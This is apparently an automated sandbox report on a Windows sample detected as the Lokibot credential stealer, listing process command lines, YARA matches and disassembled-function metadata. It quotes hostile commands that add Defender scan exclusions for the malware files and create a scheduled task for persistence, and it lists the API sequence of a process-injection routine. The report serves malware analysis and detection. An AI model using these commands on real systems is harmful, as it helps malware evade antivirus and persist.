00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.2065627493.0000000002F31000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	01:44:21
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe"
Imagebase:	0xed0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	01:44:21
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	01:44:22
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"
Imagebase:	0xed0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	01:44:22
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	01:44:22
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp"
Imagebase:	0x7a0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	01:44:22
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	01:44:22
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\YvVDV4cbjy.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\YvVDV4cbjy.exe"
Imagebase:	0xb40000
File size:	539'648 bytes
MD5 hash:	DE71DA3A473F5CDB285D30A1D6DD333B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000009.00000002.3266647288.00000000010F8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	01:44:23
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Roaming\HxQXdrrQ.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\HxQXdrrQ.exe
Imagebase:	0x440000
File size:	539'648 bytes
MD5 hash:	DE71DA3A473F5CDB285D30A1D6DD333B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000A.00000002.2110971513.0000000003934000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000A.00000002.2109669049.0000000002851000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	01:44:25
Start date:	11/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	01:44:27
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp31BF.tmp"
Imagebase:	0x7a0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	01:44:27
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	01:44:27
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Roaming\HxQXdrrQ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"
Imagebase:	0x280000
File size:	539'648 bytes
MD5 hash:	DE71DA3A473F5CDB285D30A1D6DD333B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	01:44:27
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Roaming\HxQXdrrQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\HxQXdrrQ.exe"
Imagebase:	0x830000
File size:	539'648 bytes
MD5 hash:	DE71DA3A473F5CDB285D30A1D6DD333B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: Loki_1, Description: Loki Payload, Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	5%
Total number of Nodes:	299
Total number of Limit Nodes:	9

Executed Functions

Function 013C6F90 Relevance: 1.4, Strings: 1, Instructions: 183COMMON

Download Yara Rule

Strings

fbq, xrefs: 013C71B8

Memory Dump Source

Source File: 00000000.00000002.2063264488.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_YvVDV4cbjy.jbxd

Similarity

API ID:
String ID: fbq
API String ID: 0-3185938239
Opcode ID: 9157f922582d89dd2b72d6c8fe0e344b4951db3d3ee175695bea468b2857d69d
Instruction ID: 67df2363246ffe49120a5ce866333509e58d68528614cca412ff6636ddd88093
Opcode Fuzzy Hash: 9157f922582d89dd2b72d6c8fe0e344b4951db3d3ee175695bea468b2857d69d
Instruction Fuzzy Hash: 8281E674E00209DFDB09DFA9D894ADEBBB6FF88300F148529D409AB368DB349905CF90

Function 013C3E28 Relevance: 1.4, Strings: 1, Instructions: 181COMMON

Download Yara Rule

Strings

fbq, xrefs: 013C71B8

Memory Dump Source

Source File: 00000000.00000002.2063264488.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_YvVDV4cbjy.jbxd

Similarity

API ID:
String ID: fbq
API String ID: 0-3185938239
Opcode ID: 75345ded796f7c8e60830dbded53b13b543d117dd491e53f5220ee9ea322a3bb
Instruction ID: 9235246638a9ad7cd01fc7570ca75d7a4e3c2e49cde3c80b55086690f0009a38
Opcode Fuzzy Hash: 75345ded796f7c8e60830dbded53b13b543d117dd491e53f5220ee9ea322a3bb
Instruction Fuzzy Hash: 3481E774E00209DFDB09DFA9D9949DEBBB6FF88304F148529D409AB369DB349905CF90

Function 077B9D68 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cc4b2065816405e7fc200f1cc006a00a098eec398dcf1169a815aeadd70ebf7
Instruction ID: 4a7e99f12944b5de81d69343c166f9ec7afd4c7b8f9c08bdf48ade99ae911904
Opcode Fuzzy Hash: 0cc4b2065816405e7fc200f1cc006a00a098eec398dcf1169a815aeadd70ebf7
Instruction Fuzzy Hash: F3611AB1D59219CFDB24CF66C8447E9FBB6BF8A300F14C1AAD51CA6250EB706A85CF40

Function 077BAF40 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 077BAFA5

Strings

V, xrefs: 077BAF45

Memory Dump Source

Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd

Similarity

API ID: MessagePost
String ID: V
API String ID: 410705778-1342839628
Opcode ID: 7e0eca9cd2dbfd9f1869c1a7748178235e7fc5f1e2fc3e395468a9bd845fe675
Instruction ID: 4c0b6c457f83960bac064e8dbe93fe687478c82a9bc4bc6f3e79b586441506a5
Opcode Fuzzy Hash: 7e0eca9cd2dbfd9f1869c1a7748178235e7fc5f1e2fc3e395468a9bd845fe675
Instruction Fuzzy Hash: BE11F2F5800349DFDB20DF99C589BDEBBF8EB48350F20885AE518A3210C379A584CFA1

Function 077B6BAC Relevance: 1.8, APIs: 1, Instructions: 251
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 077B6DEE

Memory Dump Source

Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: fb15f981bdcd39654707e8edce36cec9cef8061f0bf340c429b00df20b4368da
Instruction ID: 064918f8fea28ff6b00e71ddecc053b0ddd975a51f4513d7d882117696d22608
Opcode Fuzzy Hash: fb15f981bdcd39654707e8edce36cec9cef8061f0bf340c429b00df20b4368da
Instruction Fuzzy Hash: 8BA15BB1D0021ACFDB20CFA8C9847EDBBB2BF48354F1485A9D908E7240DB759985CF91

Function 077B6BB8 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 077B6DEE

Memory Dump Source

Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 074a56bc38aeb34818ae3fbcc1d781f4db8990facd59cda938bfba677b1aa467
Instruction ID: 6057ec1447023467342d0436d0811ecf416ed18ffbbd4de4312344d37c8eb83a
Opcode Fuzzy Hash: 074a56bc38aeb34818ae3fbcc1d781f4db8990facd59cda938bfba677b1aa467
Instruction Fuzzy Hash: 1A914AB1D0021ACFDB20CFA8C8447EDBBB2BF48354F1485A9D908E7250DB75A985CF91

Function 013CB1C8 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 013CB41E

Memory Dump Source

Source File: 00000000.00000002.2063264488.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_YvVDV4cbjy.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 41ff9a797670afa2ec1edceb22f992b333da9a63c503f7866868252868a7209b
Instruction ID: ae8faa9dcf6d8e1ba9df13fd0cd6399cf3d39b113ab779f58e221db214987627
Opcode Fuzzy Hash: 41ff9a797670afa2ec1edceb22f992b333da9a63c503f7866868252868a7209b
Instruction Fuzzy Hash: 1C714670A00B098FD724DF6AD44579ABBF6FF88748F00892DD48AD7A54DB35E809CB90

Function 013C590C Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 013C59C9

Memory Dump Source

Source File: 00000000.00000002.2063264488.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_YvVDV4cbjy.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 81d8438b0ff53f7a8ffb1d29790e42603659c88588746808a705d349c7a662e1
Instruction ID: 6855a95e5dec18f18952357dc7a8774f065b523b986bbc4ab035ab8b00b41f38
Opcode Fuzzy Hash: 81d8438b0ff53f7a8ffb1d29790e42603659c88588746808a705d349c7a662e1
Instruction Fuzzy Hash: CA4113B0D00719CBDB25CFAAC884BCEBBB5BF49704F20805AD408AB250DBB56946CF90

Function 013C44B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 013C59C9

Memory Dump Source

Source File: 00000000.00000002.2063264488.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_YvVDV4cbjy.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 34150a58d1ca6e053971450f46553d3b85b6e170749314f23bceaf01b041767f
Instruction ID: bb4e12429454b3a7a363339a3e5d4ff26793cc0de511801f6e7e65be9a790cd6
Opcode Fuzzy Hash: 34150a58d1ca6e053971450f46553d3b85b6e170749314f23bceaf01b041767f
Instruction Fuzzy Hash: 3141F2B0D0071DCBDB25DFAAC884BDDBBB5BF49704F20806AD408AB255DBB56945CF90

Function 077B6248 Relevance: 1.6, APIs: 1, Instructions: 82
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bfee8a4c58aa8c5ebf69bc605f01cca2542bf6c7ed3d8a71a8011b1cd08e365
Instruction ID: 4bcba04aeaba21a5965ddda607d50bffaae0ea33738c9d8f706454a11bb05a7c
Opcode Fuzzy Hash: 0bfee8a4c58aa8c5ebf69bc605f01cca2542bf6c7ed3d8a71a8011b1cd08e365
Instruction Fuzzy Hash: 7731A9B5D002898FCB21DFA9C9453DEBFF5AF49324F2084AAC518EB290D7389945CF91

Function 077B6929 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 077B69C0

Memory Dump Source

Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 2e26db1905776d8eb93bcb91ba00c48971b4f891cf96de9aa1ba3bf8870396e7
Instruction ID: 6d62c4e76a75de056cbae20dd1f50adfa5f2d5a19186babba3183ca1e0c15fb6
Opcode Fuzzy Hash: 2e26db1905776d8eb93bcb91ba00c48971b4f891cf96de9aa1ba3bf8870396e7
Instruction Fuzzy Hash: 982146B5D002599FCB10DFA9C884BEEBBF1FF48350F10882AE919A7240C7789944CBA0

Function 077B6930 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 077B69C0

Memory Dump Source

Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 05788f4e3c2cc41492484d7761314d8dfe0a24379cb6975c19460f9eacce6ec6
Instruction ID: fd6378ea6c72c20cd88511eb3473d9adee157704cff8af08d3f9222ac92f3ab0
Opcode Fuzzy Hash: 05788f4e3c2cc41492484d7761314d8dfe0a24379cb6975c19460f9eacce6ec6
Instruction Fuzzy Hash: 2D2139B5900359DFCB10DFA9C885BEEBBF5FF48350F10882AE959A7240C7789944CBA0

Function 077B6359 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077B63DE

Memory Dump Source

Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 87ad3aca44f95c2764cfe479ed2c0b3d19ddd84bcc2d2aff7d88f177f185f9e4
Instruction ID: 2f9794d9e5eaf2f08a635cf06f190b1dd0a50074b90e9ff59324c87079a04d4e
Opcode Fuzzy Hash: 87ad3aca44f95c2764cfe479ed2c0b3d19ddd84bcc2d2aff7d88f177f185f9e4
Instruction Fuzzy Hash: 502135B5D002098FDB20DFAAC4857EEBBF5EF88354F14842AD519A7240CB789945CFA0

Function 077B6A19 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 077B6AA0

Memory Dump Source

Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4a5b366e06d9d0b535c190be9d14cb4824d9652ce3152071c382c6795e69333b
Instruction ID: bc23f4a4fb3a80e48043d1f2ae53f87cab4cb22cf8586f06a03a0154a2ac16e0
Opcode Fuzzy Hash: 4a5b366e06d9d0b535c190be9d14cb4824d9652ce3152071c382c6795e69333b
Instruction Fuzzy Hash: C12125B1D002499FCB10DFAAC884AEEFBF1FF48310F10842AE519A7250D7389941CBA0

Function 013CB0B4 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013CD66E,?,?,?,?,?), ref: 013CD72F

Memory Dump Source

Source File: 00000000.00000002.2063264488.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_YvVDV4cbjy.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: dc0ed7e4630486ddc9a107c57656571bc42cdd3a862c795b8d98179394d14bef
Instruction ID: 676fae89e70461967b32e00cde486033b87bad1b4ccae0d1e3a4b9b52a715d6b
Opcode Fuzzy Hash: dc0ed7e4630486ddc9a107c57656571bc42cdd3a862c795b8d98179394d14bef
Instruction Fuzzy Hash: F421E5B59002489FDB10DF9AD584ADEBBF9EB48710F14841AE918A3310D378A954CFA5

Function 077B6360 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077B63DE

Memory Dump Source

Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 9e0c413ab1f1d4525c979284f08ed84bda12f6dbfede5b5c8a5f1c213da75cdc
Instruction ID: 11a9167a33f952664e243d4e3dc0b6e16d57feb1758889454a316c4c072ff3f9
Opcode Fuzzy Hash: 9e0c413ab1f1d4525c979284f08ed84bda12f6dbfede5b5c8a5f1c213da75cdc
Instruction Fuzzy Hash: 8C2127B5D003098FDB10DFAAC4857EEBBF5EF48354F14842AD519A7241CB78A945CFA1

Function 077B6A20 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 077B6AA0

Memory Dump Source

Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: ed6d0683ba1a0d88dac91534769efbb46e8303383c9a712b262e4313c800f249
Instruction ID: 452979af95753f7d50a179ed925c33a51efb351109b3b1425ddc6ae4e7e5db95
Opcode Fuzzy Hash: ed6d0683ba1a0d88dac91534769efbb46e8303383c9a712b262e4313c800f249
Instruction Fuzzy Hash: 362125B1C002499FCB10DFAAC884AEEFBF5FF48310F50842AE919A7250C7389940CBA0

Function 013CD6A1 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,013CD66E,?,?,?,?,?), ref: 013CD72F

Memory Dump Source

Source File: 00000000.00000002.2063264488.00000000013C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_YvVDV4cbjy.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2b67ad806b7954615005aa22d80023b9a1e99a43bce55670258689f1ec5c6c92
Instruction ID: a980ec4362d1e58c005315357341e038c83efb950dea50bcff07589b47933302
Opcode Fuzzy Hash: 2b67ad806b7954615005aa22d80023b9a1e99a43bce55670258689f1ec5c6c92
Instruction Fuzzy Hash: DA21C4B5900249DFDB10CF99D584AEEBBF5FB48714F14841AE918B3350D378A944CFA5

Function 077B6868 Relevance: 1.6, APIs: 1, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 077B68DE

Memory Dump Source

Source File: 00000000.00000002.2078023887.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_77b0000_YvVDV4cbjy.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 9d16a353aabd845504cde2314d49a0d743dfd0cb088d9b04c9e1a7433755010a
